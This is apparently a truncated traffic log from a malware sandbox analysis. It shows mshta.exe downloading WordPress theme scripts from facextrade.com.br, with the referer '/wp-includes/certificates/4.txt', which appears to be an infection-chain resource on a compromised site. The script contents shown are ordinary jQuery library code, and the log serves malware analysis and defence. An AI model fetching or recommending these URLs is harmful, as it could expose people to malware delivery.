22 22 29 29 29 7d 61 2e 69 6d 61 67 65 5f 73 3d 61 2e 6d 65 64 69 61 2e 6d 2e 72 65 70 6c 61 63 65 28 22 5f 6d 22 2c 22 5f 73 22 29 3b 61 2e 69 6d 61 67 65 5f 74 3d 61 2e 6d 65 64 69 61 2e 6d 2e 72 65 70 6c 61 63 65 28 22 5f 6d 22 2c 22 5f 74 22 29 3b 61 2e 69 6d 61 67 65 5f 6d 3d 61 2e 6d 65 64 69 61 2e 6d 2e 72 65 70 6c 61 63 65 28 22 5f 6d 22 2c 22 5f 6d 22 29 3b 61 2e 69 6d 61 67 65 3d 61 2e 6d 65 64 69 61 2e 6d 2e 72 65 70 6c 61 63 65 28 22 5f 6d 22 2c 22 22 29 3b 61 2e 69 6d 61 67 65 5f 62 3d 61 2e 6d 65 64 69 61 2e 6d 2e 72 65 70 6c 61 63 65 28 22 5f 6d 22 2c 22 5f 62 22 29 3b 64 65 6c 65 74 65 20 61 2e 6d 65 64 69 61 3b 69 66 28 63 2e 75 73 65 54 65 6d 70 6c 61 74 65 29 7b 76 61 72 20 62 3d 63 2e 69 74 65 6d 54 65 6d 70 6c 61 74 65 2c 68 3b 66 6f 72 28 68 20 69 6e 20 61 29 62 3d 62 2e 72 65 70 6c 61 63 65 28 52 65 67 45 78 70 28 22 7b 7b 22 2b 68 2b
                                        Data Ascii: (function(b){b.fn.jflickrfeed=function(c,e){c=b.extend(!0,{flickrbase:"//api.flickr.com/services/feeds/",feedapi:"photos_public.gne",limit:20,qstrings:{lang:"en-us",format:"json",jsoncallback:"?"},cleanDescription:!0,useTemplate:!0,itemTemplate:"",itemCallback:function(){}},c);var d=c.flickrbase+c.feedapi+"?",f=!0,g;for(g in c.qstrings)f||(d+="&"),d+=g+"="+c.qstrings[g],f=!1;return b(this).each(function(){var g=b(this),f=this;b.getJSON(d,function(d){b.each(d.items,function(d,a){if(d<c.limit){if(c.cleanDescription){var b=/<p>(.*?)<\/p>/g,e=a.description;b.test(e)&&(a.description=e.match(b)[2],void 0!=a.description&&(a.description=a.description.replace("<p>","").replace("</p>","")))}a.image_s=a.media.m.replace("_m","_s");a.image_t=a.media.m.replace("_m","_t");a.image_m=a.media.m.replace("_m","_m");a.image=a.media.m.replace("_m","");a.image_b=a.media.m.replace("_m","_b");delete a.media;if(c.useTemplate){var b=c.itemTemplate,h;for(h in a)b=b.replace(RegExp("{{"+h+
                                        Aug 16, 2022 10:48:52.793291092 CEST1201OUTGET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:53.030198097 CEST1216INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:50 GMT
                                        Server: Apache
                                        ETag: "a534b4-1b97-58592d4796c00"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:20 GMT
                                        Content-Length: 7063
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664485 18313610
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 64 6f 63 75 6d 65 6e 74 20 72 65 61 64 79 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 42 6c 6f 67 20 6d 61 73 6f 6e 72 79 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 69 66 28 6a 51 75 65 72 79 28 27 62 6f 64 79 2e 62 6c 6f 67 27 29 5b 30 5d 29 7b 0a 09 09 76 61 72 20 69 73 6f 74 6f 70 65 5f 68 6f 6c 64 65 72 20 3d 20 6a 51 75 65 72 79 28 27 2e 69 73 6f 74 6f 70 65 27 29 3b 0a 09 09 69 73 6f 74 6f 70 65 5f 68 6f 6c 64 65 72 2e 69 6d 61 67 65 73 4c 6f 61 64 65 64 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 69 73 6f 74 6f 70 65 5f 68 6f 6c 64 65 72 2e 69 73 6f 74 6f 70 65 28 7b 0a 09 09 09 09 69 74 65 6d 53 65 6c 65 63 74 6f 72 20 3a 20 27 2e 70 6f 73 74 5f 77 72 61 70 70 65 72 27 2c 0a 09 09 09 09 68 69 64 64 65 6e 43 6c 61 73 73 20 3a 20 27 68 69 64 64 65 6e 27 2c 0a 09 09 09 09 72 65 73 69 7a 61 62 6c 65 20 3a 20 74 72 75 65 2c 0a 09 09 09 09 74 72 61 6e 73 66 6f 72 6d 73 45 6e 61 62 6c 65 64 20 3a 20 66 61 6c 73 65 2c 0a 09 09 09 09 6c 61 79 6f 75 74 4d 6f 64 65 3a 20 27 6d 61 73 6f 6e 72 79 27 0a 09 09 09 7d 29 2e 62 69 6e 64 28 22 72 65 73 69 7a 65 2e 72 61 69 6e 62 6f 77 73 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 09 09 69 73 6f 74 6f 70 65 5f 68 6f 6c 64 65 72 2e 69 73 6f 74 6f 70 65 28 27 72 65 4c 61 79 6f 75 74 27 29 3b 0a 09 09 09 7d 29 2e 74 72 69 67 67 65 72 28 22 72 65 73 69 7a 65 2e 72 61 69 6e 62 6f 77 73 22 29 2e 63 73 73 28 7b 27 76 69 73 69 62 69 6c 69 74 79 27 3a 27 76 69 73 69 62 6c 65 27 7d 29 3b 0a 09 09 7d 29 3b 0a 09 7d 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 43 61 6c 6c 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 6a 51 75 65 72 79 28 22 2e 74 68 75 6d 62 6e 61 69 6c 22 29 2e 70 61 72 65 6e 74 28 29 2e
                                        Data Ascii: // ---------------------------------------------------------// !!!!!!!!!!!!!!!!!document ready!!!!!!!!!!!!!!!!!!!!!!!!!!// ---------------------------------------------------------jQuery(document).ready(function(){// ---------------------------------------------------------// Blog masonry// ---------------------------------------------------------if(jQuery('body.blog')[0]){var isotope_holder = jQuery('.isotope');isotope_holder.imagesLoaded( function() {isotope_holder.isotope({itemSelector : '.post_wrapper',hiddenClass : 'hidden',resizable : true,transformsEnabled : false,layoutMode: 'masonry'}).bind("resize.rainbows", function(){isotope_holder.isotope('reLayout');}).trigger("resize.rainbows").css({'visibility':'visible'});});}// ---------------------------------------------------------// Call Magnific Popup// ---------------------------------------------------------jQuery(".thumbnail").parent().
                                        Aug 16, 2022 10:48:53.034631014 CEST1223OUTGET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:53.269911051 CEST1280INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:38:28 GMT
                                        Server: Apache
                                        ETag: "a5353d-4343-58592d4a732c0"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:23 GMT
                                        Content-Length: 17219
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664487 17526139
                                        Age: 624
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 77 69 6e 64 6f 77 2e 64 65 66 69 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 2e 70 6f 70 28 29 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 7d 3b 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 63 6c 65 61 6e 44 61 74 61 29 7b 76 61 72 20 63 3d 61 2e 63 6c 65 61 6e 44 61 74 61 3b 61 2e 63 6c 65 61 6e 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 2c 65 3b 28 65 3d 62 5b 64 5d 29 21 3d 6e 75 6c 6c 3b 64 2b 2b 29 7b 61 28 65 29 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 28 22 72 65 6d 6f 76 65 22 29 7d 63 28 62 29 7d 7d 65 6c 73 65 7b 76 61 72 20 64 3d 61 2e 66 6e 2e 72 65 6d 6f 76 65 3b 61 2e 66 6e 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 63 29 7b 69 66 28 21 62 7c 7c 61 2e 66 69 6c 74 65 72 28 62 2c 5b 74 68 69 73 5d 29 2e 6c 65 6e 67 74 68 29 7b 61 28 22 2a 22 2c 74 68 69 73 29 2e 61 64 64 28 5b 74 68 69 73 5d 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 74 68 69 73 29 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 28 22 72 65 6d 6f 76 65 22 29 7d 29 7d 7d 72 65 74 75 72 6e 20 64 2e 63 61 6c 6c 28 61 28 74 68 69 73 29 2c 62 2c 63 29 7d 29 7d 7d 61 2e 77 69 64 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 5b 30 5d 2c 66 3b 62 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 3b 66 3d 65 2b 22 2d 22 2b 62 3b 69 66 28 21 64 29 7b 64 3d 63 3b 63 3d 61 2e 57 69 64 67 65 74 7d 61 2e 65 78 70 72 5b 22 3a 22 5d 5b 66 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 21 21 61 2e 64 61 74 61 28 63 2c 62 29 7d 3b 61 5b 65 5d 3d 61 5b 65 5d 7c 7c 7b 7d 3b 61 5b 65 5d 5b 62 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 74 68 69 73 2e 5f 63 72 65 61 74 65 57 69 64 67 65 74 28 61 2c 62 29 7d 7d 3b 76 61 72 20 67 3d 6e 65 77 20 63 3b 67 2e 6f 70 74 69 6f 6e 73 3d 61 2e 65 78 74 65 6e 64 28 74 72 75 65 2c 7b 7d 2c 67 2e 6f 70 74 69 6f 6e 73 29 3b 61 5b 65 5d 5b 62 5d 2e 70 72 6f 74 6f 74 79 70 65 3d 61 2e 65 78 74 65 6e 64 28 74 72 75 65 2c 67 2c 7b 6e 61 6d 65 73 70 61 63 65 3a 65 2c 77 69 64 67 65 74 4e 61 6d 65 3a 62 2c 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 3a 61 5b 65 5d 5b 62 5d 2e 70 72 6f 74 6f 74 79 70 65 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 7c 7c 62 2c 77 69 64 67 65 74 42 61 73 65 43 6c 61 73 73 3a 66 7d 2c 64 29 3b 61 2e 77 69 64 67 65 74 2e 62 72 69 64 67 65 28 62 2c 61 5b 65 5d 5b 62 5d 29 7d 3b 61 2e 77 69 64 67 65 74 2e 62 72 69 64 67 65 3d 66
                                        Data Ascii: window.define=function(){Array.prototype.slice.call(arguments).pop()(window.jQuery)};define(["jquery"],function(a){(function(a,b){if(a.cleanData){var c=a.cleanData;a.cleanData=function(b){for(var d=0,e;(e=b[d])!=null;d++){a(e).triggerHandler("remove")}c(b)}}else{var d=a.fn.remove;a.fn.remove=function(b,c){return this.each(function(){if(!c){if(!b||a.filter(b,[this]).length){a("*",this).add([this]).each(function(){a(this).triggerHandler("remove")})}}return d.call(a(this),b,c)})}}a.widget=function(b,c,d){var e=b.split(".")[0],f;b=b.split(".")[1];f=e+"-"+b;if(!d){d=c;c=a.Widget}a.expr[":"][f]=function(c){return!!a.data(c,b)};a[e]=a[e]||{};a[e][b]=function(a,b){if(arguments.length){this._createWidget(a,b)}};var g=new c;g.options=a.extend(true,{},g.options);a[e][b].prototype=a.extend(true,g,{namespace:e,widgetName:b,widgetEventPrefix:a[e][b].prototype.widgetEventPrefix||b,widgetBaseClass:f},d);a.widget.bridge(b,a[e][b])};a.widget.bridge=f


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        25192.168.2.2249204187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:49:03.652647018 CEST1439OUTGET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:03.871315002 CEST1441INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:15 GMT
                                        Server: Apache
                                        ETag: "a4fac1-5486-58592f81e2d80"
                                        Last-Modified: Tue, 02 Apr 2019 21:39:18 GMT
                                        Content-Length: 21638
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18492618 21534522
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 46 6c 65 78 53 6c 69 64 65 72 20 76 32 2e 32 2e 32 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 20 57 6f 6f 54 68 65 6d 65 73 0a 20 2a 20 43 6f 6e 74 72 69 62 75 74 69 6e 67 20 41 75 74 68 6f 72 3a 20 54 79 6c 65 72 20 53 6d 69 74 68 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 66 6c 65 78 73 6c 69 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 61 28 62 29 3b 64 2e 76 61 72 73 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 61 2e 66 6c 65 78 73 6c 69 64 65 72 2e 64 65 66 61 75 6c 74 73 2c 63 29 3b 76 61 72 20 6a 2c 65 3d 64 2e 76 61 72 73 2e 6e 61 6d 65 73 70 61 63 65 2c 66 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 6d 73 50 6f 69 6e 74 65 72 45 6e 61 62 6c 65 64 26 26 77 69 6e 64 6f 77 2e 4d 53 47 65 73 74 75 72 65 2c 67 3d 28 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 7c 7c 66 7c 7c 77 69 6e 64 6f 77 2e 44 6f 63 75 6d 65 6e 74 54 6f 75 63 68 26 26 64 6f 63 75 6d 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 6f 63 75 6d 65 6e 74 54 6f 75 63 68 29 26 26 64 2e 76 61 72 73 2e 74 6f 75 63 68 2c 68 3d 22 63 6c 69 63 6b 20 74 6f 75 63 68 65 6e 64 20 4d 53 50 6f 69 6e 74 65 72 55 70 22 2c 69 3d 22 22 2c 6b 3d 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 64 2e 76 61 72 73 2e 64 69 72 65 63 74 69 6f 6e 2c 6c 3d 64 2e 76 61 72 73 2e 72 65 76 65 72 73 65 2c 6d 3d 64 2e 76 61 72 73 2e 69 74 65 6d 57 69 64 74 68 3e 30 2c 6e 3d 22 66 61 64 65 22 3d 3d 3d 64 2e 76 61 72 73 2e 61 6e 69 6d 61 74 69 6f 6e 2c 6f 3d 22 22 21 3d 3d 64 2e 76 61 72 73 2e 61 73 4e 61 76 46 6f 72 2c 70 3d 7b 7d 2c 71 3d 21 30 3b 61 2e 64 61 74 61 28 62 2c 22 66 6c 65 78 73 6c 69 64 65 72 22 2c 64 29 2c 70 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 61 6e 69 6d 61 74 69 6e 67 3d 21 31 2c 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3d 70 61 72 73 65 49 6e 74 28 64 2e 76 61 72 73 2e 73 74 61 72 74 41 74 3f 64 2e 76 61 72 73 2e 73 74 61 72 74 41 74 3a 30 2c 31 30 29 2c 69 73 4e 61 4e 28 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 26 26 28 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3d 30 29 2c 64 2e 61 6e 69 6d 61 74 69 6e 67 54 6f 3d 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2c 64 2e 61 74 45 6e 64 3d 30 3d 3d 3d 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 7c 7c 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3d 3d 3d 64 2e 6c 61 73 74 2c 64 2e 63 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 3d 64 2e 76 61 72 73 2e 73 65 6c 65 63 74 6f 72 2e 73 75 62 73 74 72 28 30 2c 64 2e 76 61 72 73 2e 73 65 6c 65 63 74 6f 72 2e 73 65 61 72 63 68 28 22 20 22 29 29 2c 64 2e 73 6c 69 64 65 73 3d 61 28 64 2e 76 61 72 73 2e 73 65 6c 65 63 74 6f 72 2c 64 29 2c 64 2e 63 6f 6e 74 61 69 6e 65 72 3d 61 28 64 2e 63 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 2c 64 29 2c 64 2e 63 6f
                                        Data Ascii: /* * jQuery FlexSlider v2.2.2 * Copyright 2012 WooThemes * Contributing Author: Tyler Smith */!function(a){a.flexslider=function(b,c){var d=a(b);d.vars=a.extend({},a.flexslider.defaults,c);var j,e=d.vars.namespace,f=window.navigator&&window.navigator.msPointerEnabled&&window.MSGesture,g=("ontouchstart"in window||f||window.DocumentTouch&&document instanceof DocumentTouch)&&d.vars.touch,h="click touchend MSPointerUp",i="",k="vertical"===d.vars.direction,l=d.vars.reverse,m=d.vars.itemWidth>0,n="fade"===d.vars.animation,o=""!==d.vars.asNavFor,p={},q=!0;a.data(b,"flexslider",d),p={init:function(){d.animating=!1,d.currentSlide=parseInt(d.vars.startAt?d.vars.startAt:0,10),isNaN(d.currentSlide)&&(d.currentSlide=0),d.animatingTo=d.currentSlide,d.atEnd=0===d.currentSlide||d.currentSlide===d.last,d.containerSelector=d.vars.selector.substr(0,d.vars.selector.search(" ")),d.slides=a(d.vars.selector,d),d.container=a(d.containerSelector,d),d.co
                                        Aug 16, 2022 10:49:03.871342897 CEST1443INData Raw: 75 6e 74 3d 64 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2c 64 2e 73 79 6e 63 45 78 69 73 74 73 3d 61 28 64 2e 76 61 72 73 2e 73 79 6e 63 29 2e 6c 65 6e 67 74 68 3e 30 2c 22 73 6c 69 64 65 22 3d 3d 3d 64 2e 76 61 72 73 2e 61 6e 69 6d 61 74 69 6f
                                        Data Ascii: unt=d.slides.length,d.syncExists=a(d.vars.sync).length>0,"slide"===d.vars.animation&&(d.vars.animation="swing"),d.prop=k?"top":"marginLeft",d.args={},d.manualPause=!1,d.stopped=!1,d.started=!1,d.startTimeout=null,d.transitions=!d.vars.video&&!
                                        Aug 16, 2022 10:49:03.871380091 CEST1444INData Raw: 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 66 3d 30 3e 62 3f 64 2e 67 65 74 54 61 72 67 65 74 28 22 6e 65 78 74 22 29 3a 64 2e 67 65 74 54 61 72 67 65 74 28 22 70 72 65 76 22 29 3b
                                        Data Ascii: unction(a,b){a.preventDefault();var f=0>b?d.getTarget("next"):d.getTarget("prev");d.flexAnimate(f,d.vars.pauseOnAction)}),d.vars.pausePlay&&p.pausePlay.setup(),d.vars.slideshow&&d.vars.pauseInvisible&&p.pauseInvisible.init(),d.vars.slideshow&&
                                        Aug 16, 2022 10:49:03.871403933 CEST1445INData Raw: 7c 28 64 2e 64 69 72 65 63 74 69 6f 6e 3d 64 2e 63 75 72 72 65 6e 74 49 74 65 6d 3c 65 3f 22 6e 65 78 74 22 3a 22 70 72 65 76 22 2c 64 2e 66 6c 65 78 41 6e 69 6d 61 74 65 28 65 2c 64 2e 76 61 72 73 2e 70 61 75 73 65 4f 6e 41 63 74 69 6f 6e 2c 21
                                        Data Ascii: |(d.direction=d.currentItem<e?"next":"prev",d.flexAnimate(e,d.vars.pauseOnAction,!1,!0,!0))})})):d.slides.on(h,function(b){b.preventDefault();var c=a(this),f=c.index(),g=c.offset().left-a(d).scrollLeft();0>=g&&c.hasClass(e+"active-slide")?d.fl
                                        Aug 16, 2022 10:49:03.871480942 CEST1447INData Raw: 72 20 63 3d 61 28 74 68 69 73 29 2c 66 3d 64 2e 63 6f 6e 74 72 6f 6c 4e 61 76 2e 69 6e 64 65 78 28 63 29 3b 63 2e 68 61 73 43 6c 61 73 73 28 65 2b 22 61 63 74 69 76 65 22 29 7c 7c 28 64 2e 64 69 72 65 63 74 69 6f 6e 3d 66 3e 64 2e 63 75 72 72 65
                                        Data Ascii: r c=a(this),f=d.controlNav.index(c);c.hasClass(e+"active")||(d.direction=f>d.currentSlide?"next":"prev",d.flexAnimate(f,d.vars.pauseOnAction))}""===i&&(i=b.type),p.setToClearWatchedEvent()})},setupManual:function(){d.controlNav=d.manualControl
                                        Aug 16, 2022 10:49:03.871503115 CEST1448INData Raw: 6e 74 61 69 6e 65 72 29 2e 61 70 70 65 6e 64 28 62 29 2c 64 2e 64 69 72 65 63 74 69 6f 6e 4e 61 76 3d 61 28 22 2e 22 2b 65 2b 22 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 6c 69 20 61 22 2c 64 2e 63 6f 6e 74 72 6f 6c 73 43 6f 6e 74 61 69 6e 65 72
                                        Data Ascii: ntainer).append(b),d.directionNav=a("."+e+"direction-nav li a",d.controlsContainer)):(d.append(b),d.directionNav=a("."+e+"direction-nav li a",d)),p.directionNav.update(),d.directionNav.bind(h,function(b){b.preventDefault();var c;(""===i||i===b
                                        Aug 16, 2022 10:49:03.871521950 CEST1450INData Raw: 2c 22 22 3d 3d 3d 69 26 26 28 69 3d 62 2e 74 79 70 65 29 2c 70 2e 73 65 74 54 6f 43 6c 65 61 72 57 61 74 63 68 65 64 45 76 65 6e 74 28 29 7d 29 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 70 6c 61 79 22 3d 3d 3d 61 3f 64 2e
                                        Data Ascii: ,""===i&&(i=b.type),p.setToClearWatchedEvent()})},update:function(a){"play"===a?d.pausePlay.removeClass(e+"pause").addClass(e+"play").html(d.vars.playText):d.pausePlay.removeClass(e+"play").addClass(e+"pause").html(d.vars.pauseText)}},touch:fu
                                        Aug 16, 2022 10:49:03.871545076 CEST1451INData Raw: 74 68 2e 61 62 73 28 6b 29 3e 67 2f 32 29 3f 64 2e 66 6c 65 78 41 6e 69 6d 61 74 65 28 6d 2c 64 2e 76 61 72 73 2e 70 61 75 73 65 4f 6e 41 63 74 69 6f 6e 29 3a 6e 7c 7c 64 2e 66 6c 65 78 41 6e 69 6d 61 74 65 28 64 2e 63 75 72 72 65 6e 74 53 6c 69
                                        Data Ascii: th.abs(k)>g/2)?d.flexAnimate(m,d.vars.pauseOnAction):n||d.flexAnimate(d.currentSlide,d.vars.pauseOnAction,!0)}b.removeEventListener("touchend",t,!1),a=null,c=null,h=null,e=null}function u(a){a.stopPropagation(),d.animating?a.preventDefault():(
                                        Aug 16, 2022 10:49:03.871568918 CEST1453INData Raw: 6f 6e 29 3a 6e 7c 7c 64 2e 66 6c 65 78 41 6e 69 6d 61 74 65 28 64 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2c 64 2e 76 61 72 73 2e 70 61 75 73 65 4f 6e 41 63 74 69 6f 6e 2c 21 30 29 7d 61 3d 6e 75 6c 6c 2c 63 3d 6e 75 6c 6c 2c 68 3d 6e 75 6c 6c 2c
                                        Data Ascii: on):n||d.flexAnimate(d.currentSlide,d.vars.pauseOnAction,!0)}a=null,c=null,h=null,e=null,q=0}}var a,c,e,g,h,i,j=!1,o=0,p=0,q=0;f?(b.style.msTouchAction="none",b._gesture=new MSGesture,b._gesture.target=b,b.addEventListener("MSPointerDown",u,!1
                                        Aug 16, 2022 10:49:03.871589899 CEST1454INData Raw: 69 64 64 65 6e 22 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 28 70 2e 70 61 75 73 65 49 6e 76 69 73 69 62 6c 65 2e 76 69 73 50 72 6f 70 3d 61 5b 62 5d 2b 22 48 69 64 64 65 6e 22 29 3b 69 66 28 70 2e 70 61 75 73 65 49 6e 76 69 73 69 62 6c 65 2e 76 69
                                        Data Ascii: idden"in document&&(p.pauseInvisible.visProp=a[b]+"Hidden");if(p.pauseInvisible.visProp){var c=p.pauseInvisible.visProp.replace(/[H|h]idden/,"")+"visibilitychange";document.addEventListener(c,function(){p.pauseInvisible.isHidden()?d.startTimeo
                                        Aug 16, 2022 10:49:04.087519884 CEST1470INData Raw: 63 6f 6e 74 72 6f 6c 4e 61 76 2e 61 63 74 69 76 65 28 29 2c 6d 7c 7c 64 2e 73 6c 69 64 65 73 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 65 2b 22 61 63 74 69 76 65 2d 73 6c 69 64 65 22 29 2e 65 71 28 62 29 2e 61 64 64 43 6c 61 73 73 28 65 2b 22 61 63
